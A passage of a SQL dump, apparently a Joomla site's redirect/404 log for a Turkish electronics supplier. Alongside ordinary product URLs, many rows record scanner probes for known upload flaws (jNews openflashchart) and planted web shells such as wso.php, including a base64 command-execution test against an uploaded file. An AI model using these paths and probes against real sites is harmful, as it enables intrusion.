00:00:00',301),(17649,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,ordering/results,1-50',NULL,'','',3,0,'2018-01-08 16:36:20','0000-00-00 00:00:00',301),(17650,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,product_sku',NULL,'','',9,0,'2018-01-08 17:35:48','0000-00-00 00:00:00',301),(17651,'http://www.3s-technologies.com.tr/tr/urunler/temizleme-makineleri/by,`p`.product_sku/dirdesc',NULL,'','',1,0,'2018-01-08 18:37:47','0000-00-00 00:00:00',301),(17652,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/mx200lp-detail?tmpl=component&print=1',NULL,'','',1,0,'2018-01-08 20:35:48','0000-00-00 00:00:00',301),(17653,'http://3s-technologies.com.tr/tr/components/com_fabrik/fabrik.php',NULL,'','',10,0,'2018-01-08 20:43:06','0000-00-00 00:00:00',301),(17654,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,ordering/results,1-20',NULL,'','',7,0,'2018-01-08 21:43:18','0000-00-00 00:00:00',301),(17655,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,product_sku/results,1-5',NULL,'','',3,0,'2018-01-08 22:58:48','0000-00-00 00:00:00',301),(17656,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,product_name/results,1-5',NULL,'','',3,0,'2018-01-08 23:55:03','0000-00-00 00:00:00',301),(17657,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,product_sku/results,1-10',NULL,'','',3,0,'2018-01-09 00:51:17','0000-00-00 00:00:00',301),(17658,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,product_sku/results,1-20',NULL,'','',3,0,'2018-01-09 01:06:02','0000-00-00 00:00:00',301),(17659,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=164&itemid=160&lang=tr',NULL,'','',4,0,'2018-01-09 01:13:47','0000-00-00 00:00:00',301),(17660,'https://3s-technologies.com.tr/tr/ã¼rã¼nler',NULL,'','',21,0,'2018-01-09 02:28:27','0000-00-00 00:00:00',301),(17661,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,product_sku/results,1-50',NULL,'','',1,0,'2018-01-09 03:28:47','0000-00-00 00:00:00',301),(17662,'http://3s-technologies.com.tr/tr//components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php',NULL,'http://www.google.com/','',1,0,'2018-01-09 04:05:03','0000-00-00 00:00:00',301),(17663,'http://3s-technologies.com.tr/tr/libraries/joomla/database/encoding.php',NULL,'http://site.ru','',2,0,'2018-01-09 04:42:51','0000-00-00 00:00:00',301),(17664,'http://3s-technologies.com.tr/tr/administrator/includes/search.php',NULL,'http://site.ru','',1,0,'2018-01-09 04:43:24','0000-00-00 00:00:00',301),(17665,'http://3s-technologies.com.tr/tr/libraries/joomla/application/cms.php',NULL,'http://site.ru','',2,0,'2018-01-09 05:16:34','0000-00-00 00:00:00',301),(17666,'http://3s-technologies.com.tr/tr/libraries/simplepie/idn/openidopenid.php',NULL,'http://site.ru','',2,0,'2018-01-09 05:16:59','0000-00-00 00:00:00',301),(17667,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/ãƒâ§ubuk-lehim',NULL,'','',1,0,'2018-01-09 05:20:30','0000-00-00 00:00:00',301),(17668,'http://3s-technologies.com.tr/tr/administrator/components/com_joomlaupdate/www.php',NULL,'http://site.ru','',2,0,'2018-01-09 05:49:22','0000-00-00 00:00:00',301),(17669,'http://3s-technologies.com.tr/tr/images/system.php',NULL,'http://site.ru','',1,0,'2018-01-09 06:17:25','0000-00-00 00:00:00',301),(17670,'http://3s-technologies.com.tr/tr/plugins/editors-xtd/mosimage.php',NULL,'http://site.ru','',2,0,'2018-01-09 06:50:09','0000-00-00 00:00:00',301),(17671,'http://3s-technologies.com.tr/tr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php',NULL,'http://www.google.com/','',20,0,'2018-01-09 06:52:30','0000-00-00 00:00:00',301),(17672,'http://3s-technologies.com.tr/tr/administrator/includes/ini.php',NULL,'http://site.ru','',2,0,'2018-01-09 07:00:51','0000-00-00 00:00:00',301),(17673,'http://3s-technologies.com.tr/tr/00.php',NULL,'http://site.ru','',34,0,'2018-01-09 07:47:17','0000-00-00 00:00:00',301),(17674,'http://3s-technologies.com.tr/tr/images/admin.php',NULL,'http://site.ru','',53,0,'2018-01-09 07:48:31','0000-00-00 00:00:00',301),(17675,'http://3s-technologies.com.tr/tr/ui-elements.php',NULL,'http://site.ru','',4,0,'2018-01-09 07:48:38','0000-00-00 00:00:00',301),(17676,'http://3s-technologies.com.tr/tr/images/maink.php',NULL,'http://site.ru','',1,0,'2018-01-09 08:30:54','0000-00-00 00:00:00',301),(17677,'http://3s-technologies.com.tr/tr/plugins/includes.php',NULL,'http://site.ru','',1,0,'2018-01-09 08:39:46','0000-00-00 00:00:00',301),(17678,'http://3s-technologies.com.tr/tr/images/images.php',NULL,'http://site.ru','',3,0,'2018-01-09 09:53:01','0000-00-00 00:00:00',301),(17679,'http://3s-technologies.com.tr/tr/images/images.php',NULL,'http://site.ru','',1,0,'2018-01-09 09:53:01','0000-00-00 00:00:00',301),(17680,'http://3s-technologies.com.tr/tr/media/editors/tinymce/skins/lib.php',NULL,'http://site.ru','',2,0,'2018-01-09 09:53:03','0000-00-00 00:00:00',301),(17681,'http://3s-technologies.com.tr/tr/components/com_options/models/item.php',NULL,'http://site.ru','',1,0,'2018-01-09 09:53:17','0000-00-00 00:00:00',301),(17682,'http://3s-technologies.com.tr/tr//administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php',NULL,'http://www.google.com/','',1,0,'2018-01-09 10:05:38','0000-00-00 00:00:00',301),(17683,'http://3s-technologies.com.tr/tr/administrator/components/com_categories/views/category/config.php',NULL,'http://site.ru','',2,0,'2018-01-09 10:33:30','0000-00-00 00:00:00',301),(17684,'http://3s-technologies.com.tr/tr/components/com_weblinks/index.php',NULL,'http://site.ru','',2,0,'2018-01-09 10:33:36','0000-00-00 00:00:00',301),(17685,'http://3s-technologies.com.tr/tr/components/com_content/setup.php.suspected',NULL,'http://site.ru','',1,0,'2018-01-09 10:33:39','0000-00-00 00:00:00',301),(17686,'http://3s-technologies.com.tr/tr/images/librareis.php',NULL,'http://site.ru','',2,0,'2018-01-09 10:40:16','0000-00-00 00:00:00',301),(17687,'http://3s-technologies.com.tr/tr/tmp/temp.php',NULL,'http://site.ru','',1,0,'2018-01-09 10:44:42','0000-00-00 00:00:00',301),(17688,'http://3s-technologies.com.tr/tr/images/w.php.phpgif',NULL,'http://site.ru','',9,0,'2018-01-09 11:14:45','0000-00-00 00:00:00',301),(17689,'http://3s-technologies.com.tr/tr/tmp/wso.php',NULL,'http://site.ru','',3,0,'2018-01-09 11:15:17','0000-00-00 00:00:00',301),(17690,'http://3s-technologies.com.tr/tr/layouts/logo_img.php.suspected',NULL,'http://site.ru','',1,0,'2018-01-09 11:20:12','0000-00-00 00:00:00',301),(17691,'http://3s-technologies.com.tr/tr/wso.php',NULL,'http://site.ru','',366,0,'2018-01-09 12:05:27','0000-00-00 00:00:00',301),(17692,'http://3s-technologies.com.tr/tr/plugins/system/plg_system_anticopy/anticopy.php',NULL,'http://site.ru','',1,0,'2018-01-09 12:46:24','0000-00-00 00:00:00',301),(17693,'http://3s-technologies.com.tr/tr/modules/mod_stat/mod_stat.php',NULL,'http://site.ru','',1,0,'2018-01-09 12:51:50','0000-00-00 00:00:00',301),(17694,'http://3s-technologies.com.tr/tr/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php',NULL,'http://www.google.com/','',15,0,'2018-01-09 12:52:16','0000-00-00 00:00:00',301),(17695,'http://3s-technologies.com.tr/tr/libraries/cms/redirecter.php',NULL,'http://site.ru','',1,0,'2018-01-09 13:52:50','0000-00-00 00:00:00',301),(17696,'http://3s-technologies.com.tr/tr/modules/mod_txprev/libraries/archives.php',NULL,'http://site.ru','',1,0,'2018-01-09 13:52:53','0000-00-00 00:00:00',301),(17697,'http://3s-technologies.com.tr/tr/administrator/administrator.php',NULL,'http://site.ru','',4,0,'2018-01-09 13:53:08','0000-00-00 00:00:00',301),(17698,'http://www.3s-technologies.com.tr/en/wp-content/themes/thisway/includes/uploadify/upload_settings_image.php',NULL,'http://www.3s-technologies.com.tr/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php','',2,0,'2018-01-09 13:54:22','0000-00-00 00:00:00',301),(17699,'http://3s-technologies.com.tr/tr/media/system/system.php',NULL,'http://site.ru','',1,0,'2018-01-09 14:30:23','0000-00-00 00:00:00',301),(17700,'http://3s-technologies.com.tr/tr/plugins/editors/pagenews.php',NULL,'http://site.ru','',2,0,'2018-01-09 14:30:50','0000-00-00 00:00:00',301),(17701,'https://3s-technologies.com.tr/tr/ã¼rã¼nler/manufacturers/ddm-novastar',NULL,'','',8,0,'2018-01-09 14:53:38','0000-00-00 00:00:00',301),(17702,'http://3s-technologies.com.tr/tr/includes/models.php',NULL,'http://site.ru','',2,0,'2018-01-09 15:07:16','0000-00-00 00:00:00',301),(17703,'http://3s-technologies.com.tr/tr/modules/mod_manager/lang/default.php',NULL,'http://site.ru','',1,0,'2018-01-09 15:12:48','0000-00-00 00:00:00',301),(17704,'http://3s-technologies.com.tr/tr/components/com_user/views/reset/mod.php',NULL,'http://site.ru','',4,0,'2018-01-09 15:18:09','0000-00-00 00:00:00',301),(17705,'http://3s-technologies.com.tr/tr/includes/widget.php',NULL,'http://site.ru','',1,0,'2018-01-09 15:45:00','0000-00-00 00:00:00',301),(17706,'http://3s-technologies.com.tr/tr/bin/passphrase.php',NULL,'http://site.ru','',1,0,'2018-01-09 15:46:22','0000-00-00 00:00:00',301),(17707,'http://3s-technologies.com.tr/tr/templates/logo_img.php.suspected',NULL,'http://site.ru','',1,0,'2018-01-09 16:24:19','0000-00-00 00:00:00',301),(17708,'http://www.3s-technologies.com.tr/tr/joomla/administrator/index.php',NULL,'','',10,0,'2018-01-09 16:42:53','0000-00-00 00:00:00',301),(17709,'http://3s-technologies.com.tr/tr/plugins/content/defense.php',NULL,'http://site.ru','',1,0,'2018-01-09 17:02:19','0000-00-00 00:00:00',301),(17710,'http://3s-technologies.com.tr/tr/ws.php',NULL,'http://site.ru','',299,0,'2018-01-09 17:03:16','0000-00-00 00:00:00',301),(17711,'http://www.3s-technologies.com.tr/tr/up.php',NULL,'','',69,0,'2018-01-09 17:09:50','0000-00-00 00:00:00',301),(17712,'http://3s-technologies.com.tr/tr/load-config.php',NULL,'http://site.ru','',6,0,'2018-01-09 17:45:27','0000-00-00 00:00:00',301),(17713,'http://3s-technologies.com.tr/tr/tmp/error.php',NULL,'http://site.ru','',1,0,'2018-01-09 18:07:50','0000-00-00 00:00:00',301),(17714,'http://3s-technologies.com.tr/tr/modules/mod_default/tmpl/template.php',NULL,'http://site.ru','',1,0,'2018-01-09 18:08:02','0000-00-00 00:00:00',301),(17715,'http://3s-technologies.com.tr/tr/modules/mod_ariimagesws/mod_ariimagesws.php',NULL,'http://site.ru','',1,0,'2018-01-09 19:20:32','0000-00-00 00:00:00',301),(17716,'http://3s-technologies.com.tr/tr/images/mod_config.php.suspected',NULL,'http://site.ru','',2,0,'2018-01-09 19:21:38','0000-00-00 00:00:00',301),(17717,'http://3s-technologies.com.tr/tr/modules/mod_araticllws/mod_araticllws.php',NULL,'http://site.ru','',1,0,'2018-01-09 19:30:08','0000-00-00 00:00:00',301),(17718,'http://3s-technologies.com.tr/tr/layouts/joomla/system/popup-pomo.php',NULL,'http://site.ru','',7,0,'2018-01-09 20:30:15','0000-00-00 00:00:00',301),(17719,'http://3s-technologies.com.tr/tr/cache/cache.php',NULL,'http://site.ru','',3,0,'2018-01-09 20:31:08','0000-00-00 00:00:00',301),(17720,'http://3s-technologies.com.tr/tr/modules/mod_login/mod_log.php',NULL,'http://site.ru','',2,0,'2018-01-09 20:31:19','0000-00-00 00:00:00',301),(17721,'http://3s-technologies.com.tr/tr/administrator/components/com_banners/views/banners/backup.php',NULL,'http://site.ru','',3,0,'2018-01-09 20:33:08','0000-00-00 00:00:00',301),(17722,'http://3s-technologies.com.tr/tr/components/com_source/tmpl/main.tpl.php',NULL,'http://site.ru','',2,0,'2018-01-09 20:41:13','0000-00-00 00:00:00',301),(17723,'http://3s-technologies.com.tr/tr/administrator/components/com_banners/helpers/html/html.php',NULL,'http://site.ru','',1,0,'2018-01-09 21:08:13','0000-00-00 00:00:00',301),(17724,'http://3s-technologies.com.tr/tr/error_log.php',NULL,'http://site.ru','',62,0,'2018-01-09 21:17:55','0000-00-00 00:00:00',301),(17725,'http://3s-technologies.com.tr/tr/plugins/system/anticopy/anticopy.php.suspected',NULL,'http://site.ru','',1,0,'2018-01-09 21:46:19','0000-00-00 00:00:00',301),(17726,'http://3s-technologies.com.tr/tr/system.php',NULL,'http://site.ru','',154,0,'2018-01-09 21:46:51','0000-00-00 00:00:00',301),(17727,'https://3s-technologies.com.tr/tr/ã¼rã¼nler/lehimleme-malzemeleri/krem-lehim',NULL,'','',13,0,'2018-01-09 23:16:00','0000-00-00 00:00:00',301),(17728,'http://3s-technologies.com.tr/tr/components/com_search/views/search/index.php',NULL,'http://site.ru','',3,0,'2018-01-09 23:36:46','0000-00-00 00:00:00',301),(17729,'http://3s-technologies.com.tr/tr/modules/mod_araticlhess/mod_araticlhess.php',NULL,'http://site.ru','',2,0,'2018-01-09 23:36:47','0000-00-00 00:00:00',301),(17730,'http://3s-technologies.com.tr/tr/media/system/js/cms.php',NULL,'http://site.ru','',1,0,'2018-01-09 23:38:39','0000-00-00 00:00:00',301),(17731,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/k_solder-bar__250x250.png',NULL,'','',1,0,'2018-01-10 01:02:46','0000-00-00 00:00:00',301),(17732,'http://3s-technologies.com.tr/tr/modules/mod_banners/tmpl/tmpl.php',NULL,'http://site.ru','',1,0,'2018-01-10 01:26:13','0000-00-00 00:00:00',301),(17733,'http://3s-technologies.com.tr/tr/components/com_weblinks/configs.php',NULL,'http://site.ru','',2,0,'2018-01-10 01:36:22','0000-00-00 00:00:00',301),(17734,'http://3s-technologies.com.tr/tr/components/com_weblinks/configs.php',NULL,'http://site.ru','',1,0,'2018-01-10 01:36:22','0000-00-00 00:00:00',301),(17735,'http://3s-technologies.com.tr/tr/libraries/simplepie/idn/main.php',NULL,'http://site.ru','',1,0,'2018-01-10 02:02:27','0000-00-00 00:00:00',301),(17736,'http://3s-technologies.com.tr/tr/libraries/simplepie/idn/main.php',NULL,'http://site.ru','',1,0,'2018-01-10 02:02:27','0000-00-00 00:00:00',301),(17737,'http://3s-technologies.com.tr/tr/components/com_tags/lvvctmu.php',NULL,'http://site.ru','',1,0,'2018-01-10 02:02:41','0000-00-00 00:00:00',301),(17738,'http://3s-technologies.com.tr/index.php/en//components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_imaged.php',NULL,'http://www.google.com/','',1,0,'2018-01-10 02:14:37','0000-00-00 00:00:00',301),(17739,'http://3s-technologies.com.tr/tr/y.php',NULL,'http://site.ru','',120,0,'2018-01-10 02:40:19','0000-00-00 00:00:00',301),(17740,'http://3s-technologies.com.tr/tr/y.php',NULL,'http://site.ru','',1,0,'2018-01-10 02:40:19','0000-00-00 00:00:00',301),(17741,'http://3s-technologies.com.tr/tr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_imaged.php',NULL,'http://3s-technologies.com.tr/tr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_imaged.php','',15,0,'2018-01-10 03:15:02','0000-00-00 00:00:00',301),(17742,'http://3s-technologies.com.tr/tr/includes/tmp.php',NULL,'http://site.ru','',1,0,'2018-01-10 03:35:50','0000-00-00 00:00:00',301),(17743,'http://3s-technologies.com.tr/tr/language/language.php',NULL,'http://site.ru','',6,0,'2018-01-10 04:04:24','0000-00-00 00:00:00',301),(17744,'http://3s-technologies.com.tr/tr/modules/mod_systemlogpatch/mod_systemlogpatch.php',NULL,'http://site.ru','',2,0,'2018-01-10 04:04:45','0000-00-00 00:00:00',301),(17745,'http://3s-technologies.com.tr/tr/templates/system/css/system.php',NULL,'http://site.ru','',1,0,'2018-01-10 04:40:16','0000-00-00 00:00:00',301),(17746,'http://3s-technologies.com.tr/tr/plugins/user/joomla/config.php',NULL,'http://site.ru','',2,0,'2018-01-10 04:50:46','0000-00-00 00:00:00',301),(17747,'http://3s-technologies.com.tr/tr/components/com_weblinks/links.php',NULL,'http://site.ru','',4,0,'2018-01-10 05:15:24','0000-00-00 00:00:00',301),(17748,'http://3s-technologies.com.tr/tr/libraries/joomla/database/database/print.php.suspected',NULL,'http://site.ru','',2,0,'2018-01-10 05:25:06','0000-00-00 00:00:00',301),(17749,'http://3s-technologies.com.tr/tr/image.php',NULL,'http://site.ru','',23,0,'2018-01-10 05:51:13','0000-00-00 00:00:00',301),(17750,'http://3s-technologies.com.tr/en/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_imaged.php',NULL,'http://3s-technologies.com.tr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_imaged.php','',7,0,'2018-01-10 06:07:02','0000-00-00 00:00:00',301),(17751,'http://3s-technologies.com.tr/tr/administrator/includes/sirine.php',NULL,'http://site.ru','',2,0,'2018-01-10 06:16:33','0000-00-00 00:00:00',301),(17752,'http://3s-technologies.com.tr/tr/components/components.php',NULL,'http://site.ru','',1,0,'2018-01-10 06:30:20','0000-00-00 00:00:00',301),(17753,'http://3s-technologies.com.tr/en/components/com_advertisementboard/includes/css/advertisementboard.css',NULL,'3s-technologies.com.tr','',1,0,'2018-01-10 06:31:59','0000-00-00 00:00:00',301),(17754,'http://3s-technologies.com.tr/tr/modules/mod_ariimageslidersa/mod_ariimageslidersa.php.suspected',NULL,'http://site.ru','',1,0,'2018-01-10 07:39:19','0000-00-00 00:00:00',301),(17755,'http://3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/toor.php',NULL,'http://site.ru','',5,0,'2018-01-10 08:48:36','0000-00-00 00:00:00',301),(17756,'http://3s-technologies.com.tr/tr/modules/mod_stat/mod_stat.php.suspected',NULL,'http://site.ru','',2,0,'2018-01-10 09:22:34','0000-00-00 00:00:00',301),(17757,'http://3s-technologies.com.tr/tr/modules/mod_fxprev/libraries/archives.php',NULL,'http://site.ru','',1,0,'2018-01-10 10:06:54','0000-00-00 00:00:00',301),(17758,'https://3s-technologies.com.tr/tr/ã¼rã¼nler/manufacturers/panasonic',NULL,'','',6,0,'2018-01-10 10:50:06','0000-00-00 00:00:00',301),(17759,'http://3s-technologies.com.tr/index.php/en/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_imaged.php',NULL,'http://3s-technologies.com.tr/index.php/en/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_imaged.php','',1,0,'2018-01-10 11:27:59','0000-00-00 00:00:00',301),(17760,'http://3s-technologies.com.tr/tr//administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_imaged.php',NULL,'http://www.google.com/','',1,0,'2018-01-10 12:21:54','0000-00-00 00:00:00',301),(17761,'http://3s-technologies.com.tr/tr/components/com_content/contents.php',NULL,'http://site.ru','',6,0,'2018-01-10 14:02:44','0000-00-00 00:00:00',301),(17762,'http://3s-technologies.com.tr/tr/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_imaged.php',NULL,'http://www.google.com/','',2,0,'2018-01-10 15:17:47','0000-00-00 00:00:00',301),(17763,'https://3s-technologies.com.tr/tr/ã¼rã¼nler/lehimleme-malzemeleri/flux',NULL,'','',8,0,'2018-01-10 16:31:02','0000-00-00 00:00:00',301),(17764,'https://3s-technologies.com.tr/tr/ã¼rã¼nler/temizleme-makineleri',NULL,'','',5,0,'2018-01-10 20:47:28','0000-00-00 00:00:00',301),(17765,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,product_sku/results,1-20',NULL,'','',6,0,'2018-01-10 21:25:34','0000-00-00 00:00:00',301),(17766,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,product_name/results,1-50',NULL,'','',4,0,'2018-01-10 21:52:52','0000-00-00 00:00:00',301),(17767,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,product_name/results,1-10',NULL,'','',6,0,'2018-01-10 22:08:12','0000-00-00 00:00:00',301),(17768,'http://www.3s-technologies.com.tr/tr/components/com_foxcontact',NULL,'','',2,0,'2018-01-10 22:55:54','0000-00-00 00:00:00',301),(17769,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,product_name/results,1-20',NULL,'','',11,0,'2018-01-11 00:25:51','0000-00-00 00:00:00',301),(17770,'https://3s-technologies.com.tr/tr/ã¼rã¼nler/lehimleme-malzemeleri/ã§ubuk-lehim',NULL,'','',9,0,'2018-01-11 02:05:04','0000-00-00 00:00:00',301),(17771,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,product_name/results,1-5',NULL,'','',2,0,'2018-01-11 03:13:31','0000-00-00 00:00:00',301),(17772,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturers/ddm-novastar',NULL,'','',9,0,'2018-01-11 07:18:56','0000-00-00 00:00:00',301),(17773,'http://3s-technologies.com.tr/tr/ã¼rã¼nler/smd-orta-hä±zlä±',NULL,'','',4,0,'2018-01-11 15:32:03','0000-00-00 00:00:00',301),(17774,'http://3s-technologies.com.tr/tr/components/com_jnews/includes/openflashchart/tmp-upload-images/255test.php',NULL,'http://www.google.com/','',6,0,'2018-01-12 03:27:55','0000-00-00 00:00:00',301),(17775,'http://3s-technologies.com.tr/tr/ã¼rã¼nler/dalga-lehim',NULL,'','',5,0,'2018-01-12 05:27:22','0000-00-00 00:00:00',301),(17776,'http://3s-technologies.com.tr/en/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_imaged.php',NULL,'http://3s-technologies.com.tr/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_imaged.php','',2,0,'2018-01-12 06:05:17','0000-00-00 00:00:00',301),(17777,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,product_name/results,1-20',NULL,'','',5,0,'2018-01-12 09:43:16','0000-00-00 00:00:00',301),(17778,'http://3s-technologies.com.tr/tr/administrator/components/com_jnews/includes/openflashchart/tmp-upload-images/255test.php?com=123&content=zwnobyaidmrhzhnmz2rmijs=',NULL,'http://3s-technologies.com.tr/tr/administrator/components/com_jnews/includes/openflashchart/tmp-upload-images/255test.php?com=123&content=ZWNobyAidmRhZHNmZ2RmIjs=','',1,0,'2018-01-12 10:27:44','0000-00-00 00:00:00',301),(17779,'http://3s-technologies.com.tr/tr//components/com_jnews/includes/openflashchart/tmp-upload-images/255test.php?com=123&content=zwnobyaidmrhzhnmz2rmijs=',NULL,'http://www.google.com/','',1,0,'2018-01-12 10:27:44','0000-00-00 00:00:00',301),(17780,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,`p`.product_sku/dirdesc',NULL,'','',6,0,'2018-01-12 10:32:47','0000-00-00 00:00:00',301),(17781,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,`p`.product_sku/results,1-5',NULL,'','',1,0,'2018-01-12 11:40:14','0000-00-00 00:00:00',301),(17782,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,`p`.product_sku/results,1-50',NULL,'','',6,0,'2018-01-12 12:40:14','0000-00-00 00:00:00',301),(17783,'http://3s-technologies.com.tr/gtde.php',NULL,'3s-technologies.com.tr','',7,0,'2018-01-12 12:55:42','0000-00-00 00:00:00',301),(17784,'http://3s-technologies.com.tr/options.php',NULL,'3s-technologies.com.tr','',12,0,'2018-01-12 12:59:11','0000-00-00 00:00:00',301),(17785,'http://3s-technologies.com.tr/yt2.php',NULL,'3s-technologies.com.tr','',8,0,'2018-01-12 13:02:09','0000-00-00 00:00:00',301),(17786,'http://3s-technologies.com.tr/wp-conde.php',NULL,'3s-technologies.com.tr','',8,0,'2018-01-12 13:02:59','0000-00-00 00:00:00',301),(17787,'http://3s-technologies.com.tr/wp-includes/modules.php',NULL,'3s-technologies.com.tr','',1,0,'2018-01-12 13:03:33','0000-00-00 00:00:00',301),(17788,'http://3s-technologies.com.tr/hivcxa.php',NULL,'3s-technologies.com.tr','',8,0,'2018-01-12 13:04:28','0000-00-00 00:00:00',301),(17789,'http://3s-technologies.com.tr/sfn.php',NULL,'3s-technologies.com.tr','',6,0,'2018-01-12 13:05:02','0000-00-00 00:00:00',301),(17790,'http://3s-technologies.com.tr/templates/protostar/js/templatedetails.php',NULL,'3s-technologies.com.tr','',7,0,'2018-01-12 13:05:14','0000-00-00 00:00:00',301),(17791,'http://3s-technologies.com.tr/pols.php',NULL,'3s-technologies.com.tr','',5,0,'2018-01-12 13:05:41','0000-00-00 00:00:00',301),(17792,'http://3s-technologies.com.tr/axmlprc.php',NULL,'3s-technologies.com.tr','',5,0,'2018-01-12 13:07:54','0000-00-00 00:00:00',301),(17793,'http://3s-technologies.com.tr/en/administrator/components/com_jnews/includes/openflashchart/tmp-upload-images/255test.php?com=123&content=zwnobyaidmrhzhnmz2rmijs=',NULL,'http://3s-technologies.com.tr/administrator/components/com_jnews/includes/openflashchart/tmp-upload-images/255test.php?com=123&content=ZWNobyAidmRhZHNmZ2RmIjs=','',2,0,'2018-01-12 13:08:15','0000-00-00 00:00:00',301),(17794,'http://3s-technologies.com.tr/maill.php',NULL,'3s-technologies.com.tr','',8,0,'2018-01-12 13:08:38','0000-00-00 00:00:00',301),(17795,'http://3s-technologies.com.tr/webconfig.txt.php',NULL,'3s-technologies.com.tr','',8,0,'2018-01-12 13:11:16','0000-00-00 00:00:00',301),(17796,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,`p`.product_sku/results,1-10',NULL,'','',8,0,'2018-01-12 16:17:43','0000-00-00 00:00:00',301),(17797,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-fä±rä±n',NULL,'','',1,0,'2018-01-12 17:02:51','0000-00-00 00:00:00',301),(17798,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,`p`.product_sku/results,1-10',NULL,'','',4,0,'2018-01-12 17:06:28','0000-00-00 00:00:00',301),(17799,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,pc.ordering,product_name/dirdesc',NULL,'','',4,0,'2018-01-12 18:40:13','0000-00-00 00:00:00',301),(17800,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,`p`.product_sku/results,1-20',NULL,'','',5,0,'2018-01-12 19:40:12','0000-00-00 00:00:00',301),(17801,'https://3s-technologies.com.tr/tr/ã¼rã¼nler/smd-dã¼åÿã¼k-hä±zlä±',NULL,'','',14,0,'2018-01-12 20:15:06','0000-00-00 00:00:00',301),(17802,'http://3s-technologies.com.tr/tr/ã¼rã¼nler/smd-fä±rä±n',NULL,'','',4,0,'2018-01-12 20:52:43','0000-00-00 00:00:00',301),(17803,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/manufacturer/resized/logo-panasonic6_250x250.jpg',NULL,'','',2,0,'2018-01-13 00:06:28','0000-00-00 00:00:00',301),(17804,'http://www.3s-technologies.com.tr/en/wp-content/plugins/estatik/readme.txt',NULL,'http://www.3s-technologies.com.tr/wp-content/plugins/estatik/readme.txt','',6,0,'2018-01-13 01:41:40','0000-00-00 00:00:00',301),(17805,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/results,1-40',NULL,'','',1,0,'2018-01-13 02:44:21','0000-00-00 00:00:00',301),(17806,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/flux/955lc-37-detail',NULL,'','',1,0,'2018-01-13 04:00:32','0000-00-00 00:00:00',301),(17807,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/flux/955lc-detail',NULL,'','',1,0,'2018-01-13 04:00:35','0000-00-00 00:00:00',301),(17808,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-32-33-34-detail',NULL,'','',1,0,'2018-01-13 04:00:37','0000-00-00 00:00:00',301),(17809,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-32-33-detail',NULL,'','',1,0,'2018-01-13 04:00:39','0000-00-00 00:00:00',301),(17810,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-32-detail',NULL,'','',1,0,'2018-01-13 04:00:41','0000-00-00 